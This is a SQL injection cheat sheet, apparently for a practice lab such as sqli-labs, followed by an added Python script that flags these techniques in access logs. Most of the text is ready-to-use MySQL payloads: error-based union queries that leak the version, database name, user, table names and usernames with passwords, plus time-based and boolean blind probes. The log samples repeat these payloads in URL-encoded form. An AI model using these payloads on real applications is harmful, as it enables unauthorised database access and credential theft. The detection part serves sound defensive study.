I. Error-based injection
1. GET single-quote error-based injection
Scenario: the page output is fixed and does not display any database data, so database information is leaked through error messages instead.

Get the version number, database name and user (the count(*) and rand(0)*2 asterisks were lost to formatting in the original line and are restored here):
0' union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a+--+
Get table names; change the limit 0,1 offset to walk through the remaining names:
0'+union+select+1,2,3 from (select count(*),concat((select concat(table_name,0x3a,0x3a)from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a--+
Get user information:
0'+union+select+1,2,3 from (select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
2. GET double-quote error-based injection
Get the version number, database name and user:
0" union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a+--+
Get table names:
"+union+select+1,2,3 from (select count(*),concat((select concat(table_name,0x3a,0x3a)from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a--+
Get user information:
0"+union+select+1,2,3 from (select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
II. POST time-based and boolean-based blind injection
Scenario: used when it is not clear how to retrieve database information directly; the data is probed step by step through the page's response time, which also tells you whether the challenge is a time-based blind one.
1. Time-based blind injection
Check whether the database name is longer than 5 characters:
'and (select (if(length(database())>5,sleep(5),null)))--+
2. Boolean-based blind injection
'and (length(database())=9)--+
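From the defender's side, the three techniques above leave very recognisable fingerprints in request parameters: the floor(rand(0)*2) ... group by duplicate-key trick, union select against information_schema, sleep(n), and length(database()) comparisons. The following added example (not part of the original cheat sheet) decodes URL-encoded GET/POST parameters from constructed access-log lines and classifies them by those signatures; the log format, signature names and sample paths are assumptions for this example.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the techniques shown on this page. Constructed for this example;
# a production WAF/SIEM rule set would be broader and tuned to the application.
SIGNATURES = {
    "error-based (floor/rand/group by)": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\).*group\s+by", re.I | re.S),
    "union-based schema read": re.compile(
        r"union\s+select.*information_schema\.", re.I | re.S),
    "time-based blind (sleep)": re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I),
    "blind probe (length(database()) comparison)": re.compile(
        r"length\s*\(\s*database\s*\(\s*\)\s*\)\s*[=<>]", re.I),
}

def classify(raw_param: str) -> list[str]:
    """Return the signature names matched by one URL-encoded parameter value."""
    decoded = unquote_plus(raw_param)          # '+' -> space, %27 -> "'", %3E -> '>'
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

# Constructed access-log lines (not real traffic): method, path, [body], status.
SAMPLE_LOG = """\
GET /Less-1/?id=1 200
GET /Less-1/?id=0%27+union+select+1,2,3+from+(select+count(*),concat((select+concat(version(),0x3a,database())+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a--+ 500
POST /Less-15/ uname=%27and+(select+(if(length(database())%3E5,sleep(5),null)))--+ 200
POST /Less-15/ uname=%27and+(length(database())%3D9)--+ 200
GET /Less-1/?id=42 200
"""

LINE_RX = re.compile(r"^(GET|POST)\s+(\S+)(?:\s+(\S+=\S+))?\s+(\d{3})$")

def scan_log(text: str) -> list[tuple[int, list[str]]]:
    """Return (line number, sorted matched signatures) for each suspicious line."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = LINE_RX.match(line)
        if not m:
            continue
        method, path, body, _status = m.groups()
        # Parameters live in the query string for GET and in the body for POST.
        params = path.partition("?")[2] if method == "GET" else (body or "")
        matched = sorted({s for p in params.split("&")
                          for s in classify(p.partition("=")[2])})
        if matched:
            hits.append((n, matched))
    return hits
```

Signature matching like this catches the textbook payloads from this page but is easily evaded by encoding or comment tricks; it is a detection aid, and the actual fix remains parameterised queries in the application.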